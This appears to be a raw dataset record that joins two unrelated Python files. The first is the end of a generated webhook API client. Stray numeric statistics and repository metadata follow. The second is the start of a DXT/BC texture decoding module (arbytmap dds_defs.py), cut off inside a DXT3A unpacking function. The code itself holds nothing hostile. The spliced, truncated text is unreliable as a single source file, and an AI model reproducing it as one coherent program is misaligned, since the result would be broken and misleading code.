        ``params`` carries the validated kwargs (body and framework
        options); ``accept``/``content_type`` toggle the JSON headers
        exactly as each generated endpoint set them.
        """
        header_params = {}
        if accept:
            # HTTP header `Accept`
            header_params['Accept'] = self.api_client.select_header_accept(
                ['application/json'])
        if content_type:
            # HTTP header `Content-Type`
            header_params['Content-Type'] = \
                self.api_client.select_header_content_type(
                    ['application/json'])
        return self.api_client.call_api(
            resource_path, http_method,
            path_params if path_params is not None else {},
            query_params if query_params is not None else [],
            header_params,
            body=params.get('body'),
            post_params=[],
            files={},
            response_type=response_type,
            auth_settings=[],  # Authentication setting
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats={})

    # ------------------------------------------------------------------
    # Public endpoints
    # ------------------------------------------------------------------

    def create_web_hook(self, **kwargs):
        """Create webhook.

        Synchronous by default; pass async_req=True for an asynchronous
        request, in which case the request thread is returned.

        >>> thread = api.create_web_hook(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param WebHookDto body:
        :return: WebHookDto
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_web_hook_with_http_info(**kwargs)
        (data) = self.create_web_hook_with_http_info(**kwargs)
        return data

    def create_web_hook_with_http_info(self, **kwargs):
        """Create webhook (full HTTP info variant).

        Same contract as :meth:`create_web_hook`.
        """
        params = self._collect_params(kwargs, ['body'], 'create_web_hook')
        return self._call(
            '/api2/v1/webhooks', 'POST', params,
            accept=True, content_type=True, response_type='WebHookDto')

    def delete_web_hook(self, web_hook_id, **kwargs):
        """Delete webhook.

        Synchronous by default; pass async_req=True for an asynchronous
        request, in which case the request thread is returned.

        >>> thread = api.delete_web_hook(web_hook_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int web_hook_id: (required)
        :return: None
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_web_hook_with_http_info(web_hook_id, **kwargs)
        (data) = self.delete_web_hook_with_http_info(web_hook_id, **kwargs)
        return data

    def delete_web_hook_with_http_info(self, web_hook_id, **kwargs):
        """Delete webhook (full HTTP info variant).

        Same contract as :meth:`delete_web_hook`; raises ValueError when
        web_hook_id is None.
        """
        params = self._collect_params(
            kwargs, ['web_hook_id'], 'delete_web_hook')
        self._require(web_hook_id, 'web_hook_id', 'delete_web_hook')
        return self._call(
            '/api2/v1/webhooks/{webHookId}', 'DELETE', params,
            path_params={'webHookId': web_hook_id},
            response_type=None)

    def get_web_hook(self, web_hook_id, **kwargs):
        """Get webhook.

        Synchronous by default; pass async_req=True for an asynchronous
        request, in which case the request thread is returned.

        >>> thread = api.get_web_hook(web_hook_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int web_hook_id: (required)
        :return: WebHookDto
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_web_hook_with_http_info(web_hook_id, **kwargs)
        (data) = self.get_web_hook_with_http_info(web_hook_id, **kwargs)
        return data

    def get_web_hook_with_http_info(self, web_hook_id, **kwargs):
        """Get webhook (full HTTP info variant).

        Same contract as :meth:`get_web_hook`; raises ValueError when
        web_hook_id is None.
        """
        params = self._collect_params(
            kwargs, ['web_hook_id'], 'get_web_hook')
        self._require(web_hook_id, 'web_hook_id', 'get_web_hook')
        return self._call(
            '/api2/v1/webhooks/{webHookId}', 'GET', params,
            path_params={'webHookId': web_hook_id},
            accept=True, response_type='WebHookDto')

    def get_web_hook_list(self, **kwargs):
        """Lists webhooks.

        Synchronous by default; pass async_req=True for an asynchronous
        request, in which case the request thread is returned.

        >>> thread = api.get_web_hook_list(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int page_number: Page number, starting with 0, default 0
        :param int page_size: Page size, accepts values between 1 and 50, default 50
        :return: PageDtoWebHookDto
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_web_hook_list_with_http_info(**kwargs)
        (data) = self.get_web_hook_list_with_http_info(**kwargs)
        return data

    def get_web_hook_list_with_http_info(self, **kwargs):
        """Lists webhooks (full HTTP info variant).

        Same contract as :meth:`get_web_hook_list`.
        """
        params = self._collect_params(
            kwargs, ['page_number', 'page_size'], 'get_web_hook_list')
        query_params = []
        if 'page_number' in params:
            query_params.append(('pageNumber', params['page_number']))
        if 'page_size' in params:
            query_params.append(('pageSize', params['page_size']))
        return self._call(
            '/api2/v1/webhooks', 'GET', params,
            query_params=query_params, accept=True,
            response_type='PageDtoWebHookDto')

    def update_web_hook(self, web_hook_id, **kwargs):
        """Edit webhook.

        Synchronous by default; pass async_req=True for an asynchronous
        request, in which case the request thread is returned.

        >>> thread = api.update_web_hook(web_hook_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int web_hook_id: (required)
        :param WebHookDto body:
        :return: WebHookDto
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_web_hook_with_http_info(web_hook_id, **kwargs)
        (data) = self.update_web_hook_with_http_info(web_hook_id, **kwargs)
        return data

    def update_web_hook_with_http_info(self, web_hook_id, **kwargs):
        """Edit webhook (full HTTP info variant).

        Same contract as :meth:`update_web_hook`; raises ValueError when
        web_hook_id is None.
        """
        params = self._collect_params(
            kwargs, ['web_hook_id', 'body'], 'update_web_hook')
        self._require(web_hook_id, 'web_hook_id', 'update_web_hook')
        return self._call(
            '/api2/v1/webhooks/{webHookId}', 'PUT', params,
            path_params={'webHookId': web_hook_id},
            accept=True, content_type=True, response_type='WebHookDto')
| 36.807393
| 421
| 0.601987
| 2,232
| 18,919
| 4.818996
| 0.087366
| 0.054016
| 0.037653
| 0.03347
| 0.915024
| 0.910004
| 0.907679
| 0.89801
| 0.89801
| 0.890945
| 0
| 0.01936
| 0.306517
| 18,919
| 513
| 422
| 36.879142
| 0.800457
| 0.326127
| 0
| 0.791822
| 0
| 0
| 0.17284
| 0.035751
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040892
| false
| 0
| 0.01487
| 0
| 0.115242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3d836ca63cf992d5271ef5f62de49f2c7a005c4
| 78,444
|
py
|
Python
|
arbytmap/dds_defs.py
|
forksnd/arbytmap
|
d43e9443988da6e7ab71e29debfc3d64f39f5c92
|
[
"MIT"
] | 2
|
2020-04-11T16:14:55.000Z
|
2020-08-25T16:05:29.000Z
|
arbytmap/dds_defs.py
|
forksnd/arbytmap
|
d43e9443988da6e7ab71e29debfc3d64f39f5c92
|
[
"MIT"
] | 2
|
2020-04-18T17:23:16.000Z
|
2020-10-04T10:08:54.000Z
|
arbytmap/dds_defs.py
|
MosesofEgypt/arbytmap
|
d43e9443988da6e7ab71e29debfc3d64f39f5c92
|
[
"MIT"
] | 2
|
2020-01-30T17:52:17.000Z
|
2020-05-10T12:59:58.000Z
|
from array import array
from math import sqrt

# this will be the reference to the bitmap convertor module.
# once the module loads this will become the reference to it.
ab = None

# Prefer the compiled extension's swizzle routines when available;
# fall back to the pure-python code paths otherwise.
try:
    from arbytmap.ext import dds_defs_ext
    fast_dds_defs = True
except Exception:
    fast_dds_defs = False
def get_texel_pixel_count(width, height):
    """Return the pixel count of one texel block, clamping each side to 4."""
    clamped_w = width if width < 4 else 4
    clamped_h = height if height < 4 else 4
    return clamped_w * clamped_h
def initialize():
    """Register all DDS pixel formats with the bitmap convertor module.

    For DXT formats, alpha channels are treated specially, but are
    explicitly placed here to make sure they don't cause channel map
    swapping problems.

    Consistency fix: the DXT3A/DXT3Y and DXT5A/DXT5Y registrations used
    to pass ``unpacker``/``packer`` outside ``combine()`` while every
    other registration passed them inside; the merged keyword arguments
    are identical either way, so they are normalized to one style.
    """
    ab.FORMAT_DXT1 = "DXT1"
    ab.FORMAT_DXT2 = "DXT2"
    ab.FORMAT_DXT3 = "DXT3"
    ab.FORMAT_DXT4 = "DXT4"
    ab.FORMAT_DXT5 = "DXT5"

    # uses only the alpha channel of dxt3
    ab.FORMAT_DXT3A = "DXT3A"
    ab.FORMAT_DXT3Y = "DXT3Y"
    ab.FORMAT_DXT3AY = "DXT3AY"
    # uses only the alpha channel of dxt3, and each bit is
    # used as a stencil mask for each of the ARGB channels.
    # this format is basically A1R1G1B1 with a dxt texel swizzle
    ab.FORMAT_DXT3A1111 = "DXT3A1111"  # NOT YET IMPLEMENTED

    ab.FORMAT_DXT5A = "DXT5A"
    ab.FORMAT_DXT5Y = "DXT5Y"
    ab.FORMAT_DXT5AY = "DXT5AY"

    # normal map formats
    ab.FORMAT_DXT5NM = "DXT5NM"  # NOT YET IMPLEMENTED
    ab.FORMAT_DXN = "DXN"
    ab.FORMAT_CTX1 = "CTX1"
    ab.FORMAT_V8U8 = "V8U8"
    ab.FORMAT_V16U16 = "V16U16"
    ab.FORMAT_R8G8 = "R8G8"
    ab.FORMAT_R16G16 = "R16G16"
    ab.FORMAT_G8B8 = "G8B8"
    ab.FORMAT_G16B16 = "G16B16"

    # merge keyword overrides over a base spec dict
    combine = lambda base, **main: {
        k: (base[k] if k not in main else main[k]) for k in
        set(main.keys()).union(base.keys())}

    # Base spec shared by every block-compressed DXT-family format.
    dxt_specs = dict(
        compressed=True, dds_format=True, raw_format=False,
        packed_size_calc=dxt_packed_size_calc,
        packed_width_calc=packed_dxt_dimension_calc,
        packed_height_calc=packed_dxt_dimension_calc,
        packed_typecode='I', packed_field_sizes=(2, ),
        block_width=4, block_height=4,
        )

    ab.register_format(ab.FORMAT_DXT1, 1, **combine(
        dxt_specs, bpp=4, depths=(8, 8, 8, 8),
        unpacker=unpack_dxt1, packer=pack_dxt1))

    for fmt in (ab.FORMAT_DXT2, ab.FORMAT_DXT3):
        ab.register_format(fmt, 1, **combine(
            dxt_specs, bpp=8, depths=(8, 8, 8, 8),
            premultiplied=(fmt == ab.FORMAT_DXT2),
            unpacker=unpack_dxt2_3, packer=pack_dxt2_3))

    for fmt in (ab.FORMAT_DXT4, ab.FORMAT_DXT5):
        ab.register_format(fmt, 1, **combine(
            dxt_specs, bpp=8, depths=(8, 8, 8, 8),
            premultiplied=(fmt == ab.FORMAT_DXT4),
            unpacker=unpack_dxt4_5, packer=pack_dxt4_5))

    for fmt in (ab.FORMAT_DXT3A, ab.FORMAT_DXT3Y):
        ab.register_format(fmt, 1, **combine(
            dxt_specs, bpp=4, depths=(8,),
            unpacker=unpack_dxt3a, packer=pack_dxt3a))

    for fmt in (ab.FORMAT_DXT5A, ab.FORMAT_DXT5Y):
        ab.register_format(fmt, 1, **combine(
            dxt_specs, bpp=4, depths=(8,),
            unpacker=unpack_dxt5a, packer=pack_dxt5a))

    ab.register_format(ab.FORMAT_DXT3AY, 1, **combine(
        dxt_specs, bpp=8, depths=(8, 8),
        unpacker=unpack_dxt3a, packer=pack_dxt3a))

    ab.register_format(ab.FORMAT_DXT5AY, 1, **combine(
        dxt_specs, bpp=8, depths=(8, 8),
        unpacker=unpack_dxt5a, packer=pack_dxt5a))

    ab.register_format(ab.FORMAT_DXN, 1, **combine(
        dxt_specs, bpp=8, depths=(8, 8, 8),
        unpacker=unpack_dxn, packer=pack_dxn))

    ab.register_format(ab.FORMAT_CTX1, 1, **combine(
        dxt_specs, bpp=4, depths=(8, 8, 8),
        unpacker=unpack_ctx1, packer=pack_ctx1))

    ab.register_format(ab.FORMAT_V8U8, 1, bpp=16, dds_format=True,
                       unpacker=unpack_v8u8, packer=pack_v8u8,
                       depths=(8,8,8), offsets=(0,8,0),
                       masks=(0, 0xFF, 0xFF), packed_field_sizes=(2, ))
    ab.register_format(ab.FORMAT_V16U16, 1, bpp=32, dds_format=True,
                       unpacker=unpack_v16u16, packer=pack_v16u16,
                       depths=(16,16,16), offsets=(0,16,0),
                       masks=(0, 0xFFff, 0xFFff), packed_field_sizes=(4, ))
    ab.register_format(ab.FORMAT_R8G8, 1, bpp=16, dds_format=True,
                       unpacker=unpack_r8g8, packer=pack_r8g8,
                       depths=(8,8,8), offsets=(0,8,0),
                       masks=(0, 0xFF, 0xFF), packed_field_sizes=(2, ))
    ab.register_format(ab.FORMAT_R16G16, 1, bpp=32, dds_format=True,
                       unpacker=unpack_r16g16, packer=pack_r16g16,
                       depths=(16,16,16), offsets=(0,16,0),
                       masks=(0, 0xFFff, 0xFFff), packed_field_sizes=(4, ))
    ab.register_format(ab.FORMAT_G8B8, 1, bpp=16, dds_format=True,
                       unpacker=unpack_g8b8, packer=pack_g8b8,
                       depths=(8,8,8), offsets=(8,0,0),
                       masks=(0xFF, 0xFF, 0), packed_field_sizes=(2, ))
    ab.register_format(ab.FORMAT_G16B16, 1, bpp=32, dds_format=True,
                       unpacker=unpack_g16b16, packer=pack_g16b16,
                       depths=(16,16,16), offsets=(16,0,0),
                       masks=(0xFFff, 0xFFff, 0), packed_field_sizes=(4, ))
def _dxt_swizzle(src_pixels, orig_width, orig_height, channel_ct, swizz=False):
    '''Reorder a flat channel array between row-major and 4x4-texel order.

    When swizz is True, gathers row-major pixels into texel-ordered output
    (linear image -> texel stream); when False, scatters a texel-ordered
    stream back into row-major layout. Returns a new array of the same
    typecode and length; src_pixels is not modified.
    '''
    width, height = clip_dxt_dimensions(orig_width, orig_height)
    # number of 4x4 texels along each axis (at least one per axis)
    txl_ct_x = 1 if width < 4 else width // 4
    txl_ct_y = 1 if height < 4 else height // 4
    # texel edge lengths shrink to the original dimension when the image
    # is smaller than one full texel along that axis
    txl_w = 4 if txl_ct_x > 1 else orig_width
    txl_h = 4 if txl_ct_y > 1 else orig_height
    assert len(src_pixels) % channel_ct == 0
    dst_pixels = ab.bitmap_io.make_array(src_pixels.typecode, len(src_pixels))
    # 4 channels per pixel, 16 pixels per texel
    if fast_dds_defs:
        # accelerated C-extension path
        dds_defs_ext.dxt_swizzle(
            src_pixels, dst_pixels, swizz, channel_ct,
            txl_ct_y, txl_ct_x, txl_w, txl_h)
    else:
        # precompute the flat-array offsets of every texel row, texel
        # column, pixel column, and channel so the inner loops only add
        txl_stride = txl_h * width * channel_ct
        tx_block_offs = tuple(range(0, width * channel_ct, txl_w * channel_ct))
        y_block_offs = tuple(y * width * channel_ct for y in range(txl_h))
        x_block_offs = tuple(range(0, txl_w * channel_ct, channel_ct))
        c_block_offs = tuple(range(channel_ct))
        # i walks texel rows in the row-major image; j walks the
        # texel-ordered stream linearly
        i = j = 0
        for tx_y in range(txl_ct_y):
            if swizz:
                # gather: dst (texel order) <- src (row-major)
                for tx in tx_block_offs:
                    i_tx = i + tx
                    for y in y_block_offs:
                        i_tx_y = i_tx + y
                        for x in x_block_offs:
                            i_tx_yx = i_tx_y + x
                            for c in c_block_offs:
                                dst_pixels[j] = src_pixels[i_tx_yx + c]
                                j += 1
            else:
                # scatter: dst (row-major) <- src (texel order)
                for tx in tx_block_offs:
                    i_tx = i + tx
                    for y in y_block_offs:
                        i_tx_y = i_tx + y
                        for x in x_block_offs:
                            i_tx_yx = i_tx_y + x
                            for c in c_block_offs:
                                dst_pixels[i_tx_yx + c] = src_pixels[j]
                                j += 1
            i += txl_stride
    return dst_pixels
def unswizzle_dxt(pixels, orig_width, orig_height, channel_ct):
    '''Convert a texel-ordered channel array back into row-major layout.'''
    return _dxt_swizzle(pixels, orig_width, orig_height,
                        channel_ct, swizz=False)
def swizzle_dxt(pixels, orig_width, orig_height, channel_ct):
    '''Convert a row-major channel array into 4x4-texel order.'''
    return _dxt_swizzle(pixels, orig_width, orig_height,
                        channel_ct, swizz=True)
def dxt_packed_size_calc(fmt, width, height, depth=1):
    '''Return the packed byte size of a DXT bitmap with these dimensions.

    Dimensions are first rounded up to full 4x4 texels.
    '''
    clipped_w, clipped_h = clip_dxt_dimensions(width, height)
    bit_count = ab.BITS_PER_PIXEL[fmt] * clipped_w * clipped_h * depth
    return bit_count // 8
def packed_dxt_dimension_calc(dim, mip_level, tiled=False):
    '''Return the packed dimension for a mip level of a DXT bitmap.

    The dimension is halved once per mip level, then rounded up to a
    multiple of 4 (the texel edge length), with a floor of 4.
    The tiled flag is accepted for signature compatibility; it does not
    affect the result.
    '''
    mip_dim = dim >> mip_level
    # round up to the next multiple of 4, never below one full texel
    return max(mip_dim + (-mip_dim % 4), 4)
def clip_dxt_dimensions(width, height):
    '''Round width and height up to full 4x4 texels (minimum 4 each).'''
    return tuple(packed_dxt_dimension_calc(dim, 0)
                 for dim in (width, height))
def unpack_dxt1(arby, bitmap_index, width, height, depth=1):
    '''Unpack a DXT1/BC1 compressed bitmap into a row-major channel array.

    Each 8-byte texel holds two 5:6:5 colors followed by 16 two-bit
    palette indices. Returns the unswizzled, upscaled channel array.
    '''
    packed = arby.texture_block[bitmap_index]
    assert packed.typecode == 'I'
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    ucc = arby.unpacked_channel_count
    width, height, depth = ab.clip_dimensions(width, height, depth)
    texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
    pixels_per_texel = (width//texel_width)*(height//texel_height)
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if fast_dds_defs:
        # accelerated C-extension path
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_dxt1(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            pixels_per_texel, ucc, array("b", chan_map[: 4]))
    else:
        channels_per_texel = ucc*pixels_per_texel
        pixel_indices = range(pixels_per_texel)
        upscales = tuple(tuple(scale) for scale in upscales)
        #create the arrays to hold the color channel data
        # layout is [a, r, g, b]; alpha defaults to opaque
        c_0 = [255,0,0,0]
        c_1 = [255,0,0,0]
        c_2 = [255,0,0,0]
        c_3 = [255,0,0,0]
        transparent = [0,0,0,0]
        #stores the colors in a way we can easily access them
        colors = [c_0, c_1, c_2, c_3]
        #loop through each texel (2 uint32s per texel)
        for i in range(len(packed)//2):
            pxl_i = i*channels_per_texel
            j = i*2
            #if the format DXT1 then the two entries in the array
            #are the colors and the color indexing in that order.
            color0 = packed[j] & 65535
            color1 = (packed[j] >> 16) & 65535
            color_idx = packed[j+1]
            #unpack the colors (expand 5/6-bit fields to 8-bit with rounding)
            c_0[1] = (((color0>>11) & 31)*255 + 15)//31
            c_1[1] = (((color1>>11) & 31)*255 + 15)//31
            c_0[2] = (((color0>>5) & 63)*255 + 31)//63
            c_1[2] = (((color1>>5) & 63)*255 + 31)//63
            c_1[3] = ((color1 & 31)*255 + 15)//31
            c_0[3] = ((color0 & 31)*255 + 15)//31
            #if the first color is a larger integer
            #then color key transparency is NOT used
            if color0 > color1:
                # 4-color mode: two interpolated intermediates
                c_2[1] = (c_0[1]*2 + c_1[1])//3
                c_2[2] = (c_0[2]*2 + c_1[2])//3
                c_2[3] = (c_0[3]*2 + c_1[3])//3
                c_3[:] = [255, (c_0[1] + 2*c_1[1])//3,
                          (c_0[2] + 2*c_1[2])//3, (c_0[3] + 2*c_1[3])//3]
            else:
                # 3-color mode: one midpoint, index 3 is transparent black
                c_2[1] = (c_0[1]+c_1[1])//2
                c_2[2] = (c_0[2]+c_1[2])//2
                c_2[3] = (c_0[3]+c_1[3])//2
                c_3[:] = transparent
            for j in pixel_indices:
                # 2-bit palette index selects one of the four colors
                color = colors[(color_idx >> (j*2))&3]
                off = j*ucc + pxl_i
                dst_chan = 0
                for src_chan in chan_map:
                    if src_chan < 0 and dst_chan == 0:
                        # alpha and not reading alpha. set to full white
                        unpacked[off] = unpack_max
                    elif src_chan >= 0:
                        unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
                    dst_chan += 1
    return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxt2_3(arby, bitmap_index, width, height, depth=1):
    '''Unpack a DXT2/3 (BC2) compressed bitmap into a row-major array.

    Each 16-byte texel holds 16 explicit 4-bit alpha values followed by a
    DXT1-style color block. Returns the unswizzled, upscaled channel array.
    '''
    packed = arby.texture_block[bitmap_index]
    assert packed.typecode == 'I'
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    ucc = arby.unpacked_channel_count
    width, height, depth = ab.clip_dimensions(width, height, depth)
    texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
    pixels_per_texel = (width//texel_width)*(height//texel_height)
    #create a new array to hold the pixels after we unpack them
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if fast_dds_defs:
        # accelerated C-extension path
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_dxt2_3(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            pixels_per_texel, ucc, array("b", chan_map[: 4]))
    else:
        channels_per_texel = ucc*pixels_per_texel
        pixel_indices = range(pixels_per_texel)
        upscales = tuple(tuple(scale) for scale in upscales)
        #create the arrays to hold the color channel data
        # layout is [a, r, g, b]
        c_0 = [255,0,0,0]
        c_1 = [255,0,0,0]
        c_2 = [255,0,0,0]
        c_3 = [255,0,0,0]
        #stores the colors in a way we can easily access them
        colors = [c_0, c_1, c_2, c_3]
        #loop through each texel (4 uint32s per texel)
        for i in range(len(packed)//4):
            pxl_i = i*channels_per_texel
            j = i*4
            #DXT2/3 is much simpler than DXT4/5
            # 64-bit field of sixteen 4-bit explicit alpha values
            alpha = (packed[j+1]<<32) | packed[j]
            color0 = packed[j+2] & 65535
            color1 = (packed[j+2] >> 16) & 65535
            color_idx = packed[j+3]
            # BC2 always uses 4-color mode; normalize color order
            if color0 < color1:
                color0, color1 = color1, color0
            #unpack the colors (expand 5/6-bit fields to 8-bit with rounding)
            c_0[1] = (((color0>>11) & 31)*255 + 15)//31
            c_1[1] = (((color1>>11) & 31)*255 + 15)//31
            c_0[2] = (((color0>>5) & 63)*255 + 31)//63
            c_1[2] = (((color1>>5) & 63)*255 + 31)//63
            c_1[3] = ((color1 & 31)*255 + 15)//31
            c_0[3] = ((color0 & 31)*255 + 15)//31
            # two interpolated intermediate colors
            c_2[1] = (c_0[1]*2 + c_1[1])//3
            c_2[2] = (c_0[2]*2 + c_1[2])//3
            c_2[3] = (c_0[3]*2 + c_1[3])//3
            c_3[1] = (c_0[1] + c_1[1]*2)//3
            c_3[2] = (c_0[2] + c_1[2]*2)//3
            c_3[3] = (c_0[3] + c_1[3]*2)//3
            for j in pixel_indices:
                color = colors[(color_idx >> (j*2))&3]
                off = j*ucc + pxl_i
                # expand this pixel's 4-bit alpha to 8-bit
                a = (((alpha >> (j*4)) & 15)*255)//15
                dst_chan = 0
                for src_chan in chan_map:
                    if src_chan < 0 and dst_chan == 0:
                        # alpha and not reading alpha. set to full white
                        unpacked[off] = unpack_max
                    elif src_chan > 0:
                        # color channel comes from the palette color
                        unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
                    elif src_chan == 0:
                        # source channel 0 is the explicit alpha
                        unpacked[off + dst_chan] = upscales[dst_chan][a]
                    dst_chan += 1
    return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxt4_5(arby, bitmap_index, width, height, depth=1):
    '''Unpack a DXT4/5 (BC3) compressed bitmap into a row-major array.

    Each 16-byte texel holds two 8-bit alpha endpoints with sixteen 3-bit
    interpolation indices, followed by a DXT1-style color block. Returns
    the unswizzled, upscaled channel array.
    '''
    packed = arby.texture_block[bitmap_index]
    assert packed.typecode == 'I'
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    ucc = arby.unpacked_channel_count
    width, height, depth = ab.clip_dimensions(width, height, depth)
    texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
    pixels_per_texel = (width//texel_width)*(height//texel_height)
    #create a new array to hold the pixels after we unpack them
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    unpacked = ab.bitmap_io.make_array(unpack_code, dxt_width*dxt_height*ucc)
    upscales = list(arby.channel_upscalers)
    chan_map = list(arby.channel_mapping)
    # pad scaler/mapping lists to 4 entries; -1 marks an unmapped channel
    while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
    while len(chan_map) < 4: chan_map.append(-1)
    if fast_dds_defs:
        # accelerated C-extension path
        a_scale, r_scale, g_scale, b_scale = upscales[: 4]
        dds_defs_ext.unpack_dxt4_5(
            unpacked, packed, a_scale, r_scale, g_scale, b_scale,
            pixels_per_texel, ucc, array("b", chan_map[: 4]))
    else:
        # 8-entry table of interpolated alpha values for the current texel
        a_lookup = [0,0,0,0,0,0,0,0]
        channels_per_texel = ucc*pixels_per_texel
        pixel_indices = range(pixels_per_texel)
        upscales = tuple(tuple(scale) for scale in upscales)
        #create the arrays to hold the color channel data
        # layout is [a, r, g, b]
        c_0 = [255,0,0,0]
        c_1 = [255,0,0,0]
        c_2 = [255,0,0,0]
        c_3 = [255,0,0,0]
        #stores the colors in a way we can easily access them
        colors = [c_0, c_1, c_2, c_3]
        #loop through each texel (4 uint32s per texel)
        for i in range(len(packed)//4):
            pxl_i = i*channels_per_texel
            j = i*4
            a_lookup[0] = alpha0 = packed[j] & 255
            a_lookup[1] = alpha1 = (packed[j] >> 8) & 255
            # 48-bit field of sixteen 3-bit alpha indices
            alpha_idx = ((packed[j]>>16) & 65535) | (packed[j+1] << 16)
            #depending on which alpha is larger
            #the indexing is calculated differently
            if alpha0 > alpha1:
                # 8-value mode: six interpolated steps
                a_lookup[2] = (alpha0*6 + alpha1)//7
                a_lookup[3] = (alpha0*5 + alpha1*2)//7
                a_lookup[4] = (alpha0*4 + alpha1*3)//7
                a_lookup[5] = (alpha0*3 + alpha1*4)//7
                a_lookup[6] = (alpha0*2 + alpha1*5)//7
                a_lookup[7] = (alpha0 + alpha1*6)//7
            else:
                # 6-value mode: four steps plus explicit 0 and 255
                a_lookup[2] = (alpha0*4 + alpha1)//5
                a_lookup[3] = (alpha0*3 + alpha1*2)//5
                a_lookup[4] = (alpha0*2 + alpha1*3)//5
                a_lookup[5] = (alpha0 + alpha1*4)//5
                a_lookup[6] = 0
                a_lookup[7] = 255
            #half of the first array entry in DXT4/5 format is both
            #alpha values and the first third of the indexing
            color0 = packed[j+2] & 65535
            color1 = (packed[j+2]>>16) & 65535
            color_idx = packed[j+3]
            # BC3 always uses 4-color mode; normalize color order
            if color0 < color1:
                color0, color1 = color1, color0
            #unpack the colors (expand 5/6-bit fields to 8-bit with rounding)
            c_0[1] = (((color0>>11) & 31)*255 + 15)//31
            c_1[1] = (((color1>>11) & 31)*255 + 15)//31
            c_0[2] = (((color0>>5) & 63)*255 + 31)//63
            c_1[2] = (((color1>>5) & 63)*255 + 31)//63
            c_1[3] = ((color1 & 31)*255 + 15)//31
            c_0[3] = ((color0 & 31)*255 + 15)//31
            # two interpolated intermediate colors
            c_2[1] = (c_0[1]*2 + c_1[1])//3
            c_2[2] = (c_0[2]*2 + c_1[2])//3
            c_2[3] = (c_0[3]*2 + c_1[3])//3
            c_3[1] = (c_0[1] + c_1[1]*2)//3
            c_3[2] = (c_0[2] + c_1[2]*2)//3
            c_3[3] = (c_0[3] + c_1[3]*2)//3
            for j in pixel_indices:
                color = colors[(color_idx >> (j*2))&3]
                off = j*ucc + pxl_i
                # 3-bit index selects from the alpha lookup table
                a = a_lookup[(alpha_idx >> (j*3))&7]
                dst_chan = 0
                for src_chan in chan_map:
                    if src_chan < 0 and dst_chan == 0:
                        # alpha and not reading alpha. set to full white
                        unpacked[off] = unpack_max
                    elif src_chan > 0:
                        # color channel comes from the palette color
                        unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
                    elif src_chan == 0:
                        # source channel 0 is the interpolated alpha
                        unpacked[off + dst_chan] = upscales[dst_chan][a]
                    dst_chan += 1
    return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_dxt3a(arby, bitmap_index, width, height, depth=1):
    '''Unpack a DXT3A bitmap (per-channel DXT3-style 4-bit blocks).

    Each source channel is stored as an independent stream of 8-byte
    blocks of sixteen explicit 4-bit values (the DXT3 alpha block format).
    Returns the unswizzled, upscaled channel array.
    '''
    packed = arby.texture_block[bitmap_index]
    assert packed.typecode == 'I'
    unpack_code = arby._UNPACK_ARRAY_CODE
    unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
    unpack_max = (1<<(unpack_size*8)) - 1
    ucc = arby.unpacked_channel_count
    scc = arby.source_channel_count
    width, height, depth = ab.clip_dimensions(width, height, depth)
    texel_width, texel_height, _ = ab.clip_dimensions(width//4, height//4)
    pixels_per_texel = (width//texel_width)*(height//texel_height)
    #create a new array to hold the pixels after we unpack them
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
